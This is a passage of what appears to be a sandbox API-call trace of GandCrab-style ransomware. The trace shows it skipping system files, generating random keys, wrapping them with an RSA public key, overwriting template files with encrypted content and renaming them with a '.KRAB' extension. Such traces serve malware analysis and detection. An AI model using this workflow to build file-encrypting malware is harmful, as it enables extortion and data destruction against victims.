lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\", lpString2="Calendar insights.xltm" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Calendar insights.xltm") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Calendar insights.xltm" [0062.221] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0062.221] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Calendar insights.xltm.KRAB") returned 85 [0062.221] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Calendar insights.xltm") returned 80 [0062.221] lstrlenW (lpString=".xltm") returned 5 [0062.221] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0062.222] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".xltm ") returned 6 [0062.222] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.222] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Calendar insights.xltm") returned 80 [0062.222] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Calendar insights.xltm") returned 80 [0062.222] lstrcmpiW (lpString1="Calendar insights.xltm", lpString2="desktop.ini") returned -1 [0062.222] lstrcmpiW (lpString1="Calendar insights.xltm", lpString2="autorun.inf") returned 1 [0062.225] lstrcmpiW (lpString1="Calendar insights.xltm", lpString2="ntuser.dat") returned -1 [0062.225] lstrcmpiW (lpString1="Calendar insights.xltm", lpString2="iconcache.db") returned -1 [0062.225] lstrcmpiW (lpString1="Calendar insights.xltm", lpString2="bootsect.bak") returned 1 [0062.225] lstrcmpiW (lpString1="Calendar insights.xltm", lpString2="boot.ini") returned 1 [0062.225] lstrcmpiW (lpString1="Calendar insights.xltm", lpString2="ntuser.dat.log") returned -1 [0062.225] lstrcmpiW (lpString1="Calendar insights.xltm", lpString2="thumbs.db") returned -1 [0062.225] lstrcmpiW (lpString1="Calendar insights.xltm", lpString2="KRAB-DECRYPT.html") returned -1 [0062.226] lstrcmpiW (lpString1="Calendar insights.xltm", lpString2="KRAB-DECRYPT.txt") returned -1 [0062.226] lstrcmpiW (lpString1="Calendar insights.xltm", lpString2="CRAB-DECRYPT.txt") returned -1 [0062.226] lstrcmpiW (lpString1="Calendar insights.xltm", lpString2="ntldr") returned -1 [0062.226] lstrcmpiW (lpString1="Calendar insights.xltm", lpString2="NTDETECT.COM") returned -1 [0062.226] lstrcmpiW (lpString1="Calendar insights.xltm", lpString2="Bootfont.bin") returned 1 [0062.226] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0062.226] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0xfbca08) returned 1 [0062.226] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2f60000 [0062.227] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0062.227] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0062.227] CryptGenRandom (in: hProv=0xfbca08, dwLen=0x20, pbBuffer=0x338ea4c | out: pbBuffer=0x338ea4c) returned 1 [0062.227] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0062.227] VirtualFree (lpAddress=0x2f60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.227] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0xfbca08) returned 1 [0062.228] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2f60000 [0062.228] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0062.229] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0062.229] CryptGenRandom (in: hProv=0xfbca08, dwLen=0x8, pbBuffer=0x338ea6c | out: pbBuffer=0x338ea6c) returned 1 [0062.229] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0062.229] VirtualFree (lpAddress=0x2f60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.229] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0xfbca08) returned 1 [0062.229] CryptImportKey (in: hProv=0xfbca08, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0xfbd360) returned 1 [0062.230] CryptGetKeyParam (in: hKey=0xfbd360, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0062.230] CryptEncrypt (in: hKey=0xfbd360, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0062.230] GetLastError () returned 0x0 [0062.230] CryptDestroyKey (hKey=0xfbd360) returned 1 [0062.230] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0062.230] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0xfbca08) returned 1 [0062.231] CryptImportKey (in: hProv=0xfbca08, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0xfbd3a0) returned 1 [0062.231] CryptGetKeyParam (in: hKey=0xfbd3a0, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0062.231] CryptEncrypt (in: hKey=0xfbd3a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0062.231] GetLastError () returned 0x0 [0062.231] CryptDestroyKey (hKey=0xfbd3a0) returned 1 [0062.231] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0062.231] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Calendar insights.xltm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\calendar insights.xltm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0062.232] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x35e0000 [0062.232] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0062.232] ReadFile (in: hFile=0x440, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ea7c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338ea7c*=0xdf362, lpOverlapped=0x0) returned 1 [0062.416] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0xfff20c9e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0062.417] WriteFile (in: hFile=0x440, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0xdf362, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338ea78*=0xdf362, lpOverlapped=0x0) returned 1 [0062.419] WriteFile (in: hFile=0x440, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338ea78*=0x208, lpOverlapped=0x0) returned 1 [0062.419] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.425] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.429] CloseHandle (hObject=0x440) returned 1 [0062.575] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.576] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Calendar insights.xltm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\calendar insights.xltm"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Calendar insights.xltm.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\calendar insights.xltm.krab")) returned 1 [0062.577] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.577] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0062.577] lstrcmpW (lpString1="Cashflow analysis.xltm", lpString2=".") returned 1 [0062.577] lstrcmpW (lpString1="Cashflow analysis.xltm", lpString2="..") returned 1 [0062.577] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\", lpString2="Cashflow analysis.xltm" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Cashflow analysis.xltm") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Cashflow analysis.xltm" [0062.577] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0062.580] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Cashflow analysis.xltm.KRAB") returned 85 [0062.580] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Cashflow analysis.xltm") returned 80 [0062.580] lstrlenW (lpString=".xltm") returned 5 [0062.580] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0062.580] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".xltm ") returned 6 [0062.580] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.581] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Cashflow analysis.xltm") returned 80 [0062.581] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Cashflow analysis.xltm") returned 80 [0062.581] lstrcmpiW (lpString1="Cashflow analysis.xltm", lpString2="desktop.ini") returned -1 [0062.581] lstrcmpiW (lpString1="Cashflow analysis.xltm", lpString2="autorun.inf") returned 1 [0062.581] lstrcmpiW (lpString1="Cashflow analysis.xltm", lpString2="ntuser.dat") returned -1 [0062.581] lstrcmpiW (lpString1="Cashflow analysis.xltm", lpString2="iconcache.db") returned -1 [0062.581] lstrcmpiW (lpString1="Cashflow analysis.xltm", lpString2="bootsect.bak") returned 1 [0062.581] lstrcmpiW (lpString1="Cashflow analysis.xltm", lpString2="boot.ini") returned 1 [0062.581] lstrcmpiW (lpString1="Cashflow analysis.xltm", lpString2="ntuser.dat.log") returned -1 [0062.581] lstrcmpiW (lpString1="Cashflow analysis.xltm", lpString2="thumbs.db") returned -1 [0062.581] lstrcmpiW (lpString1="Cashflow analysis.xltm", lpString2="KRAB-DECRYPT.html") returned -1 [0062.581] lstrcmpiW (lpString1="Cashflow analysis.xltm", lpString2="KRAB-DECRYPT.txt") returned -1 [0062.581] lstrcmpiW (lpString1="Cashflow analysis.xltm", lpString2="CRAB-DECRYPT.txt") returned -1 [0062.581] lstrcmpiW (lpString1="Cashflow analysis.xltm", lpString2="ntldr") returned -1 [0062.581] lstrcmpiW (lpString1="Cashflow analysis.xltm", lpString2="NTDETECT.COM") returned -1 [0062.581] lstrcmpiW (lpString1="Cashflow analysis.xltm", lpString2="Bootfont.bin") returned 1 [0062.581] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0062.582] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0xfbca08) returned 1 [0062.582] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2f60000 [0062.583] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0062.583] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0062.583] CryptGenRandom (in: hProv=0xfbca08, dwLen=0x20, pbBuffer=0x338ea4c | out: pbBuffer=0x338ea4c) returned 1 [0062.583] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0062.583] VirtualFree (lpAddress=0x2f60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.584] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0xfbca08) returned 1 [0062.584] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2f60000 [0062.584] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0062.585] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0062.585] CryptGenRandom (in: hProv=0xfbca08, dwLen=0x8, pbBuffer=0x338ea6c | out: pbBuffer=0x338ea6c) returned 1 [0062.585] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0062.585] VirtualFree (lpAddress=0x2f60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.585] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0xfbca08) returned 1 [0062.586] CryptImportKey (in: hProv=0xfbca08, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0xfbd5e0) returned 1 [0062.586] CryptGetKeyParam (in: hKey=0xfbd5e0, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0062.586] CryptEncrypt (in: hKey=0xfbd5e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0062.586] GetLastError () returned 0x0 [0062.586] CryptDestroyKey (hKey=0xfbd5e0) returned 1 [0062.586] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0062.586] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0xfbca08) returned 1 [0062.587] CryptImportKey (in: hProv=0xfbca08, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0xfbd820) returned 1 [0062.587] CryptGetKeyParam (in: hKey=0xfbd820, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0062.587] CryptEncrypt (in: hKey=0xfbd820, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0062.587] GetLastError () returned 0x0 [0062.587] CryptDestroyKey (hKey=0xfbd820) returned 1 [0062.587] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0062.587] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Cashflow analysis.xltm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\cashflow analysis.xltm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0062.588] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x35e0000 [0062.588] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0062.588] ReadFile (in: hFile=0x440, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ea7c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338ea7c*=0x5cc66, lpOverlapped=0x0) returned 1 [0062.663] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0xfffa339a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0062.663] WriteFile (in: hFile=0x440, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0x5cc66, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338ea78*=0x5cc66, lpOverlapped=0x0) returned 1 [0062.664] WriteFile (in: hFile=0x440, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338ea78*=0x208, lpOverlapped=0x0) returned 1 [0062.664] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.668] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.670] CloseHandle (hObject=0x440) returned 1 [0062.676] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.676] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Cashflow analysis.xltm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\cashflow analysis.xltm"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Cashflow analysis.xltm.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\cashflow analysis.xltm.krab")) returned 1 [0062.677] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.677] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0062.677] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0062.677] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0062.677] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\d2ca4a08d2ca4dee3d.lock" [0062.677] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0062.678] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 86 [0062.678] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\d2ca4a08d2ca4dee3d.lock") returned 81 [0062.678] lstrlenW (lpString=".lock") returned 5 [0062.678] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0062.678] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lock ") returned 6 [0062.678] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.679] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.679] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0062.679] lstrcmpW (lpString1="Email Insights.xltm", lpString2=".") returned 1 [0062.679] lstrcmpW (lpString1="Email Insights.xltm", lpString2="..") returned 1 [0062.679] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\", lpString2="Email Insights.xltm" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Email Insights.xltm") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Email Insights.xltm" [0062.679] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0062.679] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Email Insights.xltm.KRAB") returned 82 [0062.679] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Email Insights.xltm") returned 77 [0062.679] lstrlenW (lpString=".xltm") returned 5 [0062.679] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0062.680] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".xltm ") returned 6 [0062.680] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.680] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Email Insights.xltm") returned 77 [0062.680] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Email Insights.xltm") returned 77 [0062.680] lstrcmpiW (lpString1="Email Insights.xltm", lpString2="desktop.ini") returned 1 [0062.680] lstrcmpiW (lpString1="Email Insights.xltm", lpString2="autorun.inf") returned 1 [0062.680] lstrcmpiW (lpString1="Email Insights.xltm", lpString2="ntuser.dat") returned -1 [0062.680] lstrcmpiW (lpString1="Email Insights.xltm", lpString2="iconcache.db") returned -1 [0062.680] lstrcmpiW (lpString1="Email Insights.xltm", lpString2="bootsect.bak") returned 1 [0062.680] lstrcmpiW (lpString1="Email Insights.xltm", lpString2="boot.ini") returned 1 [0062.680] lstrcmpiW (lpString1="Email Insights.xltm", lpString2="ntuser.dat.log") returned -1 [0062.680] lstrcmpiW (lpString1="Email Insights.xltm", lpString2="thumbs.db") returned -1 [0062.681] lstrcmpiW (lpString1="Email Insights.xltm", lpString2="KRAB-DECRYPT.html") returned -1 [0062.681] lstrcmpiW (lpString1="Email Insights.xltm", lpString2="KRAB-DECRYPT.txt") returned -1 [0062.681] lstrcmpiW (lpString1="Email Insights.xltm", lpString2="CRAB-DECRYPT.txt") returned 1 [0062.681] lstrcmpiW (lpString1="Email Insights.xltm", lpString2="ntldr") returned -1 [0062.681] lstrcmpiW (lpString1="Email Insights.xltm", lpString2="NTDETECT.COM") returned -1 [0062.681] lstrcmpiW (lpString1="Email Insights.xltm", lpString2="Bootfont.bin") returned 1 [0062.681] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0062.681] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0xfbbbb0) returned 1 [0062.682] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0062.682] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0062.682] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0062.682] CryptGenRandom (in: hProv=0xfbbbb0, dwLen=0x20, pbBuffer=0x338ea4c | out: pbBuffer=0x338ea4c) returned 1 [0062.682] CryptReleaseContext (hProv=0xfbbbb0, dwFlags=0x0) returned 1 [0062.682] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.683] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0xfbbe58) returned 1 [0062.683] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0062.683] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0062.684] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0062.684] CryptGenRandom (in: hProv=0xfbbe58, dwLen=0x8, pbBuffer=0x338ea6c | out: pbBuffer=0x338ea6c) returned 1 [0062.684] CryptReleaseContext (hProv=0xfbbe58, dwFlags=0x0) returned 1 [0062.684] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.684] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0xfbc100) returned 1 [0062.687] CryptImportKey (in: hProv=0xfbc100, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0xfbe0a0) returned 1 [0062.687] CryptGetKeyParam (in: hKey=0xfbe0a0, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0062.687] CryptEncrypt (in: hKey=0xfbe0a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0062.687] GetLastError () returned 0x0 [0062.687] CryptDestroyKey (hKey=0xfbe0a0) returned 1 [0062.687] CryptReleaseContext (hProv=0xfbc100, dwFlags=0x0) returned 1 [0062.687] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0xfbbcc0) returned 1 [0062.688] CryptImportKey (in: hProv=0xfbbcc0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0xfbe0a0) returned 1 [0062.688] CryptGetKeyParam (in: hKey=0xfbe0a0, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0062.688] CryptEncrypt (in: hKey=0xfbe0a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0062.688] GetLastError () returned 0x0 [0062.688] CryptDestroyKey (hKey=0xfbe0a0) returned 1 [0062.688] CryptReleaseContext (hProv=0xfbbcc0, dwFlags=0x0) returned 1 [0062.689] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Email Insights.xltm" (normalized: 